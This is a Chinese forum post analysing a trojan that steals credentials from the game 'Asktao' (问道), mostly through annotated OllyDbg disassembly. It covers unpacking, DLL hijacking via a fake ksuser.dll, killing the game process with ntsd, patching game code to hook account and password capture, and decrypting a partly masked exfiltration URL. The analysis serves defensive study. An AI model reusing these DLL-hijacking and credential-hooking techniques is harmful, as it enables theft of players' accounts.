一个《问道》游戏盗号木马简单分析

qiang 发表于 2010-7-19 20:47:39

本帖最后由 qiang 于 2010-7-21 10:39 编辑

大小: 14996 字节
修改时间: 2010年7月16日, 18:03:17
MD5: D98373808B8C6BA2D0D6F2E23E6B4AB3
SHA1: 017681A77B02FE6956D4D07F9CDC69E5D69C3526
分析工具：OD
木马主要行为：给自身程序提权，把系统文件C:\WINDOWS\system32\ksuser.dll复制为C:\WINDOWS\system32\aksuser.dll，创建3个线程函数
线程一、查找游戏，然后用关闭游戏。
线程二、读取注册表键值Software\Microsoft\Windows\ShellNoRoam\MUICacher，查找定位运行过的游戏。
线程三、线程三，获取磁盘目录，查找游戏目录。

现在开始分析EXE文件，加壳类型UPX，脱壳后。来到入口点。00401DA2 .  56             push esi                            ;  (Initial CPU selection)
00401DA3 .  6A 00          push 0                            ; /pModule = NULL
00401DA5 .  FF15 94104000 call dword ptr             ; \GetModuleHandleA
00401DAB .  8BF0          mov esi, eax
00401DAD .  FF15 90104000 call dword ptr             ; [GetCommandLineA
00401DB3 .  6A 01          push 1
00401DB5 .  50             push eax
00401DB6 .  6A 00          push 0
00401DB8 .  56             push esi
00401DB9 .  E8 CB020000    call 00402089 关键call 1
00401DBE .  5E             pop esi
00401DBF .  C3             retn关键call 1 ，创建3个线程函数00402089 /$  B8 70224000    mov eax, 00402270
0040208E |.  E8 AD010000    call 00402240
00402093 |.  81EC 2C010000 sub esp, 12C
00402099 |.  53             push ebx
0040209A |.  56             push esi
0040209B |.  57             push edi
0040209C |.  33DB          xor ebx, ebx
0040209E |.  8965 F0       mov , esp
004020A1 |.  53             push ebx                            ; /timer => NULL
004020A2 |.  FF15 D8104000 call dword ptr             ; \time
004020A8 |.  50             push eax                            ; /seed
004020A9 |.  FF15 DC104000 call dword ptr             ; \srand
004020AF |.  59             pop ecx
004020B0 |.  59             pop ecx
004020B1 |.  E8 1BF5FFFF    call 004015D1                      ;  提权
004020B6 |.  FF15 2C114000 call dword ptr             ; [GetInputState
004020BC |.  53             push ebx                            ; /lParam
004020BD |.  53             push ebx                            ; |wParam
004020BE |.  53             push ebx                            ; |Message
004020BF |.  FF15 A4104000 call dword ptr             ; |[GetCurrentThreadId
004020C5 |.  50             push eax                            ; |ThreadId
004020C6 |.  FF15 30114000 call dword ptr             ; \PostThreadMessageA
004020CC |.  53             push ebx                            ; /MsgFilterMax
004020CD |.  53             push ebx                            ; |MsgFilterMin
004020CE |.  8D45 CC       lea eax,                ; |
004020D1 |.  53             push ebx                            ; |hWnd
004020D2 |.  50             push eax                            ; |pMsg
004020D3 |.  FF15 34114000 call dword ptr             ; \GetMessageA
004020D9 |.  895D FC       mov , ebx
004020DC |.  E8 DFFCFFFF    call 00401DC0    //读取自身资源，写入dll。
004020E1 |.  85C0          test eax, eax
004020E3 |.  75 11          jnz short 004020F6
004020E5 |.  8D45 E8       lea eax,
004020E8 |.  68 A8224000    push 004022A8
004020ED |.  50             push eax
004020EE |.  895D E8       mov , ebx
004020F1 |.  E8 6A010000    call 00402260                      ;  jmp to msvcrt._CxxThrowException
004020F6 |>  E8 47FDFFFF    call 00401E42 //此函数把系统文件C:\WINDOWS\system32\ksuser.dll复制为C:\WINDOWS\system32\aksuser.dll
004020FB |.  85C0          test eax, eax
004020FD |.  75 5C          jnz short 0040215B
004020FF |.  8D45 EC       lea eax,
00402102 |.  68 A8224000    push 004022A8
00402107 |.  50             push eax
00402108 |.  895D EC       mov , ebx
0040210B |.  E8 50010000    call 00402260                      ;  jmp to msvcrt._CxxThrowException
00402110 |.  6A 40          push 40
00402112 |.  33DB          xor ebx, ebx
00402114 |.  59             pop ecx
00402115 |.  33C0          xor eax, eax
00402117 |.  8DBD C9FEFFFF lea edi, dword ptr
0040211D |.  889D C8FEFFFF mov byte ptr , bl
00402123 |.  F3:AB          rep stos dword ptr es:
00402125 |.  66:AB          stos word ptr es:
00402127 |.  AA             stos byte ptr es:
00402128 |.  8D85 C8FEFFFF lea eax,
0040212E |.  68 03010000    push 103                            ; /BufSize = 103 (259.)
00402133 |.  50             push eax                            ; |PathBuffer
00402134 |.  53             push ebx                            ; |hModule => NULL
00402135 |.  FF15 98104000 call dword ptr             ; \GetModuleFileNameA
0040213B |.  68 E8030000    push 3E8                            ; /Timeout = 1000. ms
00402140 |.  FF15 1C104000 call dword ptr             ; \Sleep
00402146 |.  8D85 C8FEFFFF lea eax,
0040214C |.  53             push ebx                            ; /ShowState => SW_HIDE
0040214D |.  50             push eax                            ; |CmdLine
0040214E |.  FF15 6C104000 call dword ptr             ; \WinExec
00402154 |.  53             push ebx                            ; /ExitCode => 0
00402155 |.  FF15 A0104000 call dword ptr             ; \ExitProcess
0040215B |>  8B35 E0104000 mov esi, dword ptr       ;  msvcrt._beginthreadex
00402161 |.  834D FC FF    or , FFFFFFFF
00402165 |.  53             push ebx                            ; /pID
00402166 |.  53             push ebx                            ; |flags
00402167 |.  53             push ebx                            ; |arg
00402168 |.  68 8D1A4000    push 00401A8D                      ; |start = a03.00401A8D //线程一,查找游戏，然后用关闭游戏
0040216D |.  53             push ebx                            ; |stksize
0040216E |.  53             push ebx                            ; |security
0040216F |.  FFD6          call esi                            ; \_beginthreadex
00402171 |.  83C4 18       add esp, 18
00402174 |.  3BC3          cmp eax, ebx
00402176 |.  74 07          je short 0040217F
00402178 |.  50             push eax                            ; /hObject
00402179 |.  FF15 2C104000 call dword ptr             ; \CloseHandle
0040217F |>  8B3D 1C104000 mov edi, dword ptr       ;  kernel32.Sleep
00402185 |.  6A 64          push 64                            ; /Timeout = 100. ms
00402187 |.  FFD7          call edi                            ; \Sleep
00402189 |.  53             push ebx
0040218A |.  53             push ebx
0040218B |.  53             push ebx
0040218C |.  68 5D1C4000    push 00401C5D //线程二，读注册表键值Software\Microsoft\Windows\ShellNoRoam\MUICacher，作用是快速找到游戏
00402191 |.  53             push ebx
00402192 |.  53             push ebx
00402193 |.  FFD6          call esi
00402195 |.  83C4 18       add esp, 18
00402198 |.  3BC3          cmp eax, ebx
0040219A |.  74 07          je short 004021A3
0040219C |.  50             push eax                            ; /hObject
0040219D |.  FF15 2C104000 call dword ptr             ; \CloseHandle
004021A3 |>  6A 64          push 64
004021A5 |.  FFD7          call edi //sleep函数
004021A7 |.  E8 6AFDFFFF    call 00401F16 //获取一个随机6位数，把自身文件复制到临时文件夹下，这里是C:\DOCUME~1\safe\LOCALS~1\Temp\rTWm6c.exe，在释放rTWm6c.dll到同目录，rTWm6c.dll和伪装的ksuser.dll文件一样
004021AC |.  E8 D3F5FFFF    call 00401784 //把木马文件ksuser.dll，复制成C\WINDOWS\system32\asktao.mod.dll，C\WINDOWS\system32\dllcache\ksuser.dll
004021B1 |.  53             push ebx
004021B2 |.  53             push ebx
004021B3 |.  53             push ebx
004021B4 |.  68 1C1A4000    push 00401A1C //线程三，获取磁盘目录，查找游戏目录
004021B9 |.  53             push ebx
004021BA |.  53             push ebx
004021BB |.  FFD6          call esi //beginthreadex
004021BD |.  83C4 18       add esp, 18
004021C0 |.  8BF0          mov esi, eax
004021C2 |.  6A FF          push -1                            ; /Timeout = INFINITE
004021C4 |.  56             push esi                            ; |hObject
004021C5 |.  FF15 50104000 call dword ptr             ; \WaitForSingleObject
004021CB |.  56             push esi                            ; /hObject
004021CC |.  FF15 2C104000 call dword ptr             ; \CloseHandle
004021D2 |.  53             push ebx                            ; /ExitCode
004021D3 \.  FF15 A0104000 call dword ptr             ; \ExitProcess线程一,作用关闭运行的游戏00401A8D /.  55             push ebp
00401A8E |.  8BEC          mov ebp, esp
00401A90 |.  81EC 4C040000 sub esp, 44C
00401A96 |.  53             push ebx
00401A97 |.  33DB          xor ebx, ebx
00401A99 |.  56             push esi
00401A9A |.  57             push edi
00401A9B |.  895D F8       mov , ebx
00401A9E |>  BE 28010000    /mov esi, 128
00401AA3 |.  8D85 C0FEFFFF |lea eax,
00401AA9 |.  56             |push esi                         ; /n => 128 (296.)
00401AAA |.  53             |push ebx                         ; |c
00401AAB |.  50             |push eax                         ; |s
00401AAC |.  E8 65070000    |call 00402216                      ; \memset //申请一段内存块
00401AB1 |.  83C4 0C       |add esp, 0C
00401AB4 |.  53             |push ebx                         ; /ProcessID
00401AB5 |.  6A 02          |push 2                            ; |Flags = TH32CS_SNAPPROCESS
00401AB7 |.  E8 2A070000    |call 004021E6                      ; \CreateToolhelp32Snapshot  //创建一个进程快照
00401ABC |.  3BC3          |cmp eax, ebx
00401ABE |.  8945 FC       |mov , eax
00401AC1 |.  0F84 8D010000 |je 00401C54
00401AC7 |.  8D8D C0FEFFFF |lea ecx,
00401ACD |.  89B5 C0FEFFFF |mov , esi
00401AD3 |.  51             |push ecx                         ; /lppe
00401AD4 |.  50             |push eax                         ; |hSnapshot
00401AD5 |.  E8 06070000    |call 004021E0                      ; \Process32First
00401ADA |.  3BC3          |cmp eax, ebx
00401ADC |.  0F84 72010000 |je 00401C54
00401AE2 |>  8D85 E4FEFFFF |/lea eax,
00401AE8 |.  50             ||push eax                         ; /s2
00401AE9 |.  68 4C114000    ||push 0040114C                   ; |asktao.mod
00401AEE |.  FF15 CC104000 ||call dword ptr          ; \_stricmp //系统中的进程和asktao.mod比较，查找问道的游戏进程
00401AF4 |.  59             ||pop ecx
00401AF5 |.  85C0          ||test eax, eax
00401AF7 |.  59             ||pop ecx
00401AF8 |.  0F85 0F010000 ||jnz 00401C0D //找到往下执行，没找到跳转
00401AFE |.  FFB5 C8FEFFFF ||push                   ; /ProcessId
00401B04 |.  53             ||push ebx                         ; |Inheritable
00401B05 |.  68 FF0F1F00    ||push 1F0FFF                      ; |Access = PROCESS_ALL_ACCESS
00401B0A |.  FF15 24104000 ||call dword ptr          ; \OpenProcess //获得游戏进程ID
00401B10 |.  8BF0          ||mov esi, eax
00401B12 |.  3BF3          ||cmp esi, ebx
00401B14 |.  0F84 90000000 ||je 00401BAA
00401B1A |.  6A 40          ||push 40
00401B1C |.  33C0          ||xor eax, eax
00401B1E |.  59             ||pop ecx
00401B1F |.  8DBD BDFDFFFF ||lea edi, dword ptr
00401B25 |.  889D BCFDFFFF ||mov byte ptr , bl
00401B2B |.  6A 40          ||push 40
00401B2D |.  F3:AB          ||rep stos dword ptr es:
00401B2F |.  66:AB          ||stos word ptr es:
00401B31 |.  AA             ||stos byte ptr es:
00401B32 |.  59             ||pop ecx
00401B33 |.  33C0          ||xor eax, eax
00401B35 |.  8DBD B5FBFFFF ||lea edi, dword ptr
00401B3B |.  889D B4FBFFFF ||mov byte ptr , bl
00401B41 |.  F3:AB          ||rep stos dword ptr es:
00401B43 |.  66:AB          ||stos word ptr es:
00401B45 |.  AA             ||stos byte ptr es:
00401B46 |.  8D85 BCFDFFFF ||lea eax,
00401B4C |.  68 04010000    ||push 104
00401B51 |.  50             ||push eax
00401B52 |.  53             ||push ebx
00401B53 |.  56             ||push esi
00401B54 |.  E8 93060000    ||call 004021EC                   ;  jmp to psapi.GetModuleFileNameExA
00401B59 |.  8D85 BCFDFFFF ||lea eax,
00401B5F |.  50             ||push eax                         ; /s
00401B60 |.  E8 93060000    ||call 004021F8                   ; \strlen //获取游戏全路径长度
00401B65 |.  85C0          ||test eax, eax
00401B67 |.  59             ||pop ecx
00401B68 |.  76 25          ||jbe short 00401B8F
00401B6A |.  8D85 B4FBFFFF ||lea eax,
00401B70 |.  53             ||push ebx
00401B71 |.  50             ||push eax
00401B72 |.  8D85 BCFDFFFF ||lea eax,
00401B78 |.  50             ||push eax
00401B79 |.  E8 C9F7FFFF    ||call 00401347 //此函数获取asktao.mod所在的文件夹
00401B7E |.  8D85 B4FBFFFF ||lea eax,
00401B84 |.  50             ||push eax
00401B85 |.  E8 50FBFFFF    ||call 004016DA //释放木马文件到C:\WINDOWS\system32目录下，命名为ksuser.dll，并把创建时间改为原来系统ksuser.dll的创建时间
00401B8A |.  83C4 10       ||add esp, 10
00401B8D |.  EB 12          ||jmp short 00401BA1
00401B8F |>  68 A8274000    ||push 004027A8
00401B94 |.  FFB5 C8FEFFFF ||push
00401B9A |.  E8 89FAFFFF    ||call 00401628
00401B9F |.  59             ||pop ecx
00401BA0 |.  59             ||pop ecx
00401BA1 |>  56             ||push esi                         ; /hObject
00401BA2 |.  FF15 2C104000 ||call dword ptr          ; \CloseHandle
00401BA8 |.  EB 63          ||jmp short 00401C0D
00401BAA |>  33C0          ||xor eax, eax
00401BAC |.  8D7D E9       ||lea edi, dword ptr
00401BAF |.  885D E8       ||mov byte ptr , bl
00401BB2 |.  BE 18124000    ||mov esi, 00401218                ;  ntsd -c q -p
00401BB7 |.  AB             ||stos dword ptr es:
00401BB8 |.  AB             ||stos dword ptr es:
00401BB9 |.  AB             ||stos dword ptr es:
00401BBA |.  66:AB          ||stos word ptr es:
00401BBC |.  AA             ||stos byte ptr es:
00401BBD |.  8DBD B8FCFFFF ||lea edi,
00401BC3 |.  6A 3D          ||push 3D
00401BC5 |.  A5             ||movs dword ptr es:, dword ptr>
00401BC6 |.  A5             ||movs dword ptr es:, dword ptr>
00401BC7 |.  A5             ||movs dword ptr es:, dword ptr>
00401BC8 |.  66:A5          ||movs word ptr es:, word ptr [>
00401BCA |.  59             ||pop ecx
00401BCB |.  33C0          ||xor eax, eax
00401BCD |.  8DBD C6FCFFFF ||lea edi, dword ptr
00401BD3 |.  FFB5 C8FEFFFF ||push                   ; /<%d>
00401BD9 |.  F3:AB          ||rep stos dword ptr es:       ; |
00401BDB |.  66:AB          ||stos word ptr es:          ; |
00401BDD |.  8D45 E8       ||lea eax,                ; |
00401BE0 |.  68 14124000    ||push 00401214                   ; | %dntsd -c q -p
00401BE5 |.  50             ||push eax                         ; |s
00401BE6 |.  FF15 1C114000 ||call dword ptr          ; \sprintf //字符串处理
00401BEC |.  8D45 E8       ||lea eax,
00401BEF |.  50             ||push eax                         ; /src
00401BF0 |.  8D85 B8FCFFFF ||lea eax,             ; |
00401BF6 |.  50             ||push eax                         ; |dest
00401BF7 |.  E8 0E060000    ||call 0040220A                   ; \strcat
00401BFC |.  83C4 14       ||add esp, 14
00401BFF |.  8D85 B8FCFFFF ||lea eax,
00401C05 |.  53             ||push ebx                         ; /ShowState
00401C06 |.  50             ||push eax                         ; |CmdLine
00401C07 |.  FF15 6C104000 ||call dword ptr          ; \WinExec //用命令行运行ntsd -c q -p来关闭程序
00401C0D |>  8D85 C0FEFFFF ||lea eax,
00401C13 |.  50             ||push eax                         ; /lppe
00401C14 |.  FF75 FC       ||push                   ; |hSnapshot
00401C17 |.  E8 BE050000    ||call 004021DA                   ; \Process32Next
00401C1C |.  85C0          ||test eax, eax
00401C1E |.^ 0F85 BEFEFFFF |\jnz 00401AE2
00401C24 |.  395D F8       |cmp , ebx
00401C27 |.  75 12          |jnz short 00401C3B
00401C29 |.  68 4C114000    |push 0040114C                      ;  asktao.mod
00401C2E |.  C745 F8 0100000>|mov , 1
00401C35 |.  E8 7DF8FFFF    |call 004014B7 //在进程中查找asktao.mod，找到后关闭游戏进程
00401C3A |.  59             |pop ecx
00401C3B |>  FF75 FC       |push                   ; /hObject
00401C3E |.  FF15 2C104000 |call dword ptr          ; \CloseHandle
00401C44 |.  68 88130000    |push 1388                         ; /Timeout = 5000. ms
00401C49 |.  FF15 1C104000 |call dword ptr          ; \Sleep
00401C4F |.^ E9 4AFEFFFF    \jmp 00401A9E
00401C54 |>  5F             pop edi
00401C55 |.  5E             pop esi
00401C56 |.  33C0          xor eax, eax
00401C58 |.  5B             pop ebx
00401C59 |.  C9             leave
00401C5A \.  C2 0400       retn 4线程三，作用磁盘里遍历查找游戏目录。00401A1C /.  55             push ebp
00401A1D |.  8BEC          mov ebp, esp
00401A1F |.  81EC 04010000 sub esp, 104
00401A25 |.  80A5 FCFEFFFF 0>and byte ptr , 0
00401A2C |.  56             push esi
00401A2D |.  57             push edi
00401A2E |.  6A 40          push 40
00401A30 |.  59             pop ecx
00401A31 |.  33C0          xor eax, eax
00401A33 |.  8DBD FDFEFFFF lea edi, dword ptr
00401A39 |.  F3:AB          rep stos dword ptr es:
00401A3B |.  66:AB          stos word ptr es:
00401A3D |.  AA             stos byte ptr es:
00401A3E |.  8D85 FCFEFFFF lea eax,
00401A44 |.  50             push eax                            ; /Buffer
00401A45 |.  68 04010000    push 104                            ; |BufSize = 104 (260.)
00401A4A |.  FF15 8C104000 call dword ptr             ; \GetLogicalDriveStringsA
00401A50 |.  80BD FCFEFFFF 0>cmp byte ptr , 0
00401A57 |.  8DB5 FCFEFFFF lea esi,
00401A5D |.  74 25          je short 00401A84
00401A5F |>  56             /push esi                         ; /RootPathName
00401A60 |.  FF15 88104000 |call dword ptr          ; \GetDriveTypeA
00401A66 |.  83F8 03       |cmp eax, 3
00401A69 |.  75 07          |jnz short 00401A72
00401A6B |.  56             |push esi
00401A6C |.  E8 69FEFFFF    |call 004018DA //循环查找函数
00401A71 |.  59             |pop ecx
00401A72 |>  56             |push esi                         ; /String
00401A73 |.  FF15 68104000 |call dword ptr          ; \lstrlenA
00401A79 |.  807C06 01 00 |cmp byte ptr , 0
00401A7E |.  8D7406 01    |lea esi, dword ptr
00401A82 |.^ 75 DB          \jnz short 00401A5F
00401A84 |>  6A 01          push 1
00401A86 |.  58             pop eax
00401A87 |.  5F             pop edi
00401A88 |.  5E             pop esi
00401A89 |.  C9             leave
00401A8A \.  C2 0400       retn 4今天先写到这，明天在加分析游戏调试分析ksuser.dll文件

现在来分析ksuser.dll，注册一个账号testli，密码12345607A7341B /$  837C24 08 01    cmp dword ptr ss:,1 //入口点
07A73420 |.  75 30          jnz short ksuser.07A73452
07A73422 |.  56             push esi
07A73423 |.  E8 1FFFFFFF    call ksuser.07A73347
07A73428 |.  8B4424 08       mov eax,dword ptr ss:
07A7342C |.  33F6          xor esi,esi
07A7342E |.  56             push esi                                     ; /pID => NULL
07A7342F |.  56             push esi                                     ; |flags => 0
07A73430 |.  56             push esi                                     ; |arg => NULL
07A73431 |.  68 7B31A707    push ksuser.07A7317B                         ; |start = ksuser.07A7317B 线程函数4
07A73436 |.  56             push esi                                     ; |stksize => 0
07A73437 |.  56             push esi                                     ; |security => NULL
07A73438 |.  A3 C06CA707    mov dword ptr ds:,eax                ; |
07A7343D |.  FF15 D840A707 call dword ptr ds:[<&MSVCRT._beginthreadex>] ; \_beginthreadex
07A73443 |.  83C4 18       add esp,18
07A73446 |.  3BC6          cmp eax,esi
07A73448 |.  5E             pop esi
07A73449 |.  74 07          je short ksuser.07A73452
07A7344B |.  50             push eax                                     ; /hObject
07A7344C |.  FF15 6840A707 call dword ptr ds:[<&KERNEL32.CloseHandle>]    ; \CloseHandle
07A73452 |>  6A 01          push 1
07A73454 |.  58             pop eax
07A73455 \.  C2 0C00       retn 0C进入线程函数：07A7317B /.  55             push ebp
07A7317C |.  8BEC          mov ebp,esp
07A7317E |.  81EC 10030000 sub esp,310
07A73184 |.  53             push ebx
07A73185 |.  56             push esi
07A73186 |.  57             push edi
07A73187 |.  6A 40          push 40
07A73189 |.  33DB          xor ebx,ebx
07A7318B |.  59             pop ecx
07A7318C |.  33C0          xor eax,eax
07A7318E |.  8DBD F5FDFFFF lea edi,dword ptr ss:
07A73194 |.  889D F4FDFFFF mov byte ptr ss:,bl
07A7319A |.  68 F0010000    push 1F0                                     ; /n = 1F0 (496.)
07A7319F |.  F3:AB          rep stosd                                     ; |
07A731A1 |.  66:AB          stosw                                        ; |
07A731A3 |.  53             push ebx                                     ; |c => 00
07A731A4 |.  68 3866A707    push ksuser.07A76638                         ; |s = ksuser.07A76638
07A731A9 |.  AA             stosb                                        ; |
07A731AA |.  E8 BB020000    call <jmp.&MSVCRT.memset>                      ; \memset//分配一段内存块
07A731AF |.  83C4 0C       add esp,0C
07A731B2 |.  8D85 F4FDFFFF lea eax,
07A731B8 |.  68 03010000    push 103                                     ; /BufSize = 103 (259.)
07A731BD |.  50             push eax                                     ; |PathBuffer
07A731BE |.  53             push ebx                                     ; |hModule => NULL
07A731BF |.  FF15 4040A707 call dword ptr ds:[<&KERNEL32.GetModuleFileName>; \GetModuleFileNameA //获取当前进程名
07A731C5 |.  8D85 F4FDFFFF lea eax,
07A731CB |.  50             push eax
07A731CC |.  E8 83EFFFFF    call ksuser.07A72154
07A731D1 |.  C70424 8051A707  mov dword ptr ss:,ksuser.07A75180       ; |ASCII "asktao.mod"
07A731D8 |.  50             push eax                                     ; |s1
07A731D9 |.  8945 FC       mov ,eax                            ; |
07A731DC |.  FF15 C840A707 call dword ptr ds:[<&MSVCRT._stricmp>]       ; \_stricmp //比较
07A731E2 |.  59             pop ecx
07A731E3 |.  85C0          test eax,eax
07A731E5 |.  59             pop ecx
07A731E6 |.  75 0A          jnz short ksuser.07A731F2
07A731E8 |.  C705 5C58B107 01>mov dword ptr ds:,1
07A731F2 |>  FF15 C440A707 call dword ptr ds:[<&MSVCRT._getpid>]          ; [GetCurrentProcessId
07A731F8 |.  50             push eax                                     ; /lParam
07A731F9 |.  68 732FA707    push ksuser.07A72F73                         ; |Callback = ksuser.07A72F73
07A731FE |.  FF15 1C41A707 call dword ptr ds:[<&USER32.EnumWindows>]    ; \EnumWindows
07A73204 |.  E8 1CFEFFFF    call ksuser.07A73025 //call 2 读取资源，解密出发信地址
07A73209 |.  391D 5C58B107 cmp dword ptr ds:,ebx
07A7320F |.  8B35 E440A707 mov esi,dword ptr ds:[<&MSVCRT.sprintf>]       ;  msvcrt.sprintf
07A73215 |.  75 37          jnz short ksuser.07A7324E
07A73217 |.  6A 40          push 40
07A73219 |.  33C0          xor eax,eax
07A7321B |.  59             pop ecx
07A7321C |.  8DBD F9FEFFFF lea edi,dword ptr ss:
07A73222 |.  889D F8FEFFFF mov byte ptr ss:,bl
07A73228 |.  FF75 FC       push                               ; /<%s>
07A7322B |.  F3:AB          rep stosd                                     ; |
07A7322D |.  66:AB          stosw                                        ; |
07A7322F |.  AA             stosb                                        ; |
07A73230 |.  8D85 F8FEFFFF lea eax,                            ; |
07A73236 |.  68 5455A707    push ksuser.07A75554                         ; |format = "%s.dll"
07A7323B |.  50             push eax                                     ; |s
07A7323C |.  FFD6          call esi                                     ; \sprintf
07A7323E |.  83C4 0C       add esp,0C
07A73241 |.  8D85 F8FEFFFF lea eax,
07A73247 |.  50             push eax                                     ; /FileName
07A73248 |.  FF15 8840A707 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
07A7324E |>  833D 5C58B107 01 cmp dword ptr ds:,1
07A73255 |.  0F85 E2000000 jnz ksuser.07A7333D
07A7325B |.  6A 40          push 40
07A7325D |.  33C0          xor eax,eax
07A7325F |.  59             pop ecx
07A73260 |.  8DBD F9FEFFFF lea edi,dword ptr ss:
07A73266 |.  889D F8FEFFFF mov byte ptr ss:,bl
07A7326C |.  6A 40          push 40
07A7326E |.  F3:AB          rep stosd
07A73270 |.  66:AB          stosw
07A73272 |.  AA             stosb
07A73273 |.  59             pop ecx
07A73274 |.  33C0          xor eax,eax
07A73276 |.  8DBD F1FCFFFF lea edi,dword ptr ss:
07A7327C |.  889D F0FCFFFF mov byte ptr ss:,bl
07A73282 |.  F3:AB          rep stosd
07A73284 |.  66:AB          stosw
07A73286 |.  AA             stosb
07A73287 |.  E8 9DF0FFFF    call ksuser.07A72329
07A7328C |.  8D85 F8FEFFFF lea eax,
07A73292 |.  68 04010000    push 104                                     ; /BufSize = 104 (260.)
07A73297 |.  50             push eax                                     ; |Buffer
07A73298 |.  FF15 7C40A707 call dword ptr ds:[<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
07A7329E |.  8D85 F8FEFFFF lea eax,
07A732A4 |.  50             push eax
07A732A5 |.  8D85 F0FCFFFF lea eax,
07A732AB |.  68 4055A707    push ksuser.07A75540                         ;  ASCII "%s\AsktaoCfg.ini"
07A732B0 |.  50             push eax
07A732B1 |.  FFD6          call esi
07A732B3 |.  68 F912A707    push ksuser.07A712F9
07A732B8 |.  68 8DF45C00    push 5CF48D //patch游戏中的地址
07A732BD |.  E8 4CEFFFFF    call <ksuser.patch游戏函数>
07A732C2 |.  BE 7A13A707    mov esi,ksuser.07A7137A
07A732C7 |.  56             push esi
07A732C8 |.  68 ECEC4400    push 44ECEC //patch地址
07A732CD |.  E8 3CEFFFFF    call <ksuser.patch游戏函数>
07A732D2 |.  56             push esi
07A732D3 |.  68 BFEE4400    push 44EEBF //patch地址
07A732D8 |.  E8 31EFFFFF    call <ksuser.patch游戏函数>
07A732DD |.  68 9A13A707    push ksuser.07A7139A
07A732E2 |.  68 6D815A00    push 5A816D //patch地址
07A732E7 |.  E8 22EFFFFF    call <ksuser.patch游戏函数>
07A732EC |.  68 F913A707    push ksuser.07A713F9
07A732F1 |.  68 9B084E00    push 4E089B //patch地址
07A732F6 |.  E8 13EFFFFF    call <ksuser.patch游戏函数>
07A732FB |.  68 5C14A707    push ksuser.07A7145C
07A73300 |.  68 897B5A00    push 5A7B89 //patch地址
07A73305 |.  E8 04EFFFFF    call <ksuser.patch游戏函数>
07A7330A |.  68 7C14A707    push ksuser.07A7147C
07A7330F |.  68 A3A85700    push 57A8A3
07A73314 |.  E8 87EFFFFF    call ksuser.07A722A0 //patch
07A73319 |.  83C4 44       add esp,44
07A7331C |.  68 4715A707    push ksuser.07A71547 //patch
07A73321 |.  68 C0706200    push 6270C0 //patch地址
07A73326 |.  E8 E3EEFFFF    call <ksuser.patch游戏函数>
07A7332B |.  68 6715A707    push ksuser.07A71567
07A73330 |.  68 2D9D5B00    push 5B9D2D //patch地址
07A73335 |.  E8 D4EEFFFF    call <ksuser.patch游戏函数>
07A7333A |.  83C4 10       add esp,10
07A7333D |>  6A 01          push 1
07A7333F |.  58             pop eax
07A73340 |.  5F             pop edi
07A73341 |.  5E             pop esi
07A73342 |.  5B             pop ebx
07A73343 |.  C9             leave
07A73344 \.  C2 0400       retn 4call 2  读取自身资源，解密出发信地址10003042 |.  68 04010000    push 104                            ; /BufSize = 104 (260.)
10003047 |.  F3:AB          rep stos dword ptr es:       ; |
10003049 |.  66:AB          stos word ptr es:             ; |
1000304B |.  AA             stos byte ptr es:             ; |
1000304C |.  8D85 FCFEFFFF lea eax,                ; |
10003052 |.  50             push eax                            ; |PathBuffer
10003053 |.  FF35 C06C0010 push dword ptr          ; |hModule = 10000000 (ksuser)
10003059 |.  FF15 40400010 call dword ptr [<&KERNEL32.GetModule>; \GetModuleFileNameA
1000305F |.  8D85 FCFEFFFF lea eax,
10003065 |.  68 50540010    push 10005450                      ; /mode = "r"
1000306A |.  50             push eax                            ; |path
1000306B |.  FF15 AC400010 call dword ptr [<&MSVCRT.fopen>]    ; \fopen  //打开自身文件
10003071 |.  8BF0          mov esi, eax
10003073 |.  59             pop ecx
10003074 |.  85F6          test esi, esi
10003076 |.  59             pop ecx
10003077 |.  0F84 FA000000 je 10003177
1000307D |.  6A 02          push 2                            ; /whence = SEEK_END
1000307F |.  68 6CFBFFFF    push -494                         ; |offset = FFFFFB6C (-1172.)
10003084 |.  56             push esi                            ; |stream
10003085 |.  FF15 9C400010 call dword ptr [<&MSVCRT.fseek>]    ; \fseek
1000308B |.  56             push esi                            ; /stream
1000308C |.  68 94040000    push 494                            ; |n = 494 (1172.)
10003091 |.  BF 28680010    mov edi, 10006828                   ; |ASCII "9EEAA7CCD7F402DF5A7BC2C5B5877119628065A823C506959B78343A74D63CE236F3FE0829BB48"
10003096 |.  6A 01          push 1                            ; |size = 1
10003098 |.  57             push edi                            ; |ptr => ksuser.10006828
10003099 |.  FF15 A0400010 call dword ptr [<&MSVCRT.fread>]    ; \fread //读文件
1000309F |.  56             push esi                            ; /stream
100030A0 |.  FF15 B0400010 call dword ptr [<&MSVCRT.fclose>] ; \fclose
100030A6 |.  BE AC6C0010    mov esi, 10006CAC                   ;  ASCII "37Ax03aCto"
100030AB |.  56             push esi
100030AC |.  E8 B8F0FFFF    call 10002169
100030B1 |.  68 8C6C0010    push 10006C8C                      ;  ASCII "1280851200"
100030B6 |.  E8 AEF0FFFF    call 10002169
100030BB |.  56             push esi
100030BC |.  57             push edi
100030BD |.  E8 3EDFFFFF    call 10001000                      ;  解密函数，解密出发信地址"http://b12.ju888.com**************.asp"用OD附加到游戏上，来到游戏中005CF48D地址005CF46F .  68 98747900    push asktao.00797498                         ;  ASCII "account=%s, password=%s, id=%s, data = %s, lock = %s, dist=%s"
005CF474 .  68 50230000    push 2350
005CF479 .  E8 C24FF8FF    call asktao.00554440
005CF47E .  8B0D 30878500 mov ecx,dword ptr ds:
005CF484 .  83C4 20       add esp,20
005CF487 .  8D4424 58       lea eax,dword ptr ss:
005CF48B .  50             push eax
005CF48C .  57             push edi
005CF48D .- E9 36E48407    jmp 07E1D8C8    //这边的代码被修改过了，变成JMP到地址07E1D8C8，而这个地址正是木马模块
找下地址07E1D8C8看一下代码：07E1D8C8    E8 2C3AC4FF       call ksuser.07A612F9 是一个函数，跟进去看看，其他几个patch地址作用一样07A612F9 /.  55             push ebp
07A612FA |.  8BEC          mov ebp,esp
07A612FC |.  51             push ecx
07A612FD |.  53             push ebx
07A612FE |.  56             push esi
07A612FF |.  57             push edi
07A61300 |.  60             pushad
07A61301 |.  897D FC       mov ,edi
07A61304 |.  E8 65FFFFFF    call ksuser.07A6126E //读取配置文件\data\config.ini中的信息，猜测是读取服务器信息
07A61309 |.  FF75 FC       push                               ; /src
07A6130C |.  68 7866A607    push ksuser.07A66678                         ; |dest = ksuser.07A66678
07A61311 |.  E8 60210000    call <jmp.&MSVCRT.strcpy>                      ; \strcpy
07A61316 |.  33F6          xor esi,esi
07A61318 |.  6A 20          push 20                                        ; /n = 20 (32.)
07A6131A |.  56             push esi                                     ; |c => 00
07A6131B |.  68 1867A607    push ksuser.07A66718                         ; |s = ksuser.07A66718
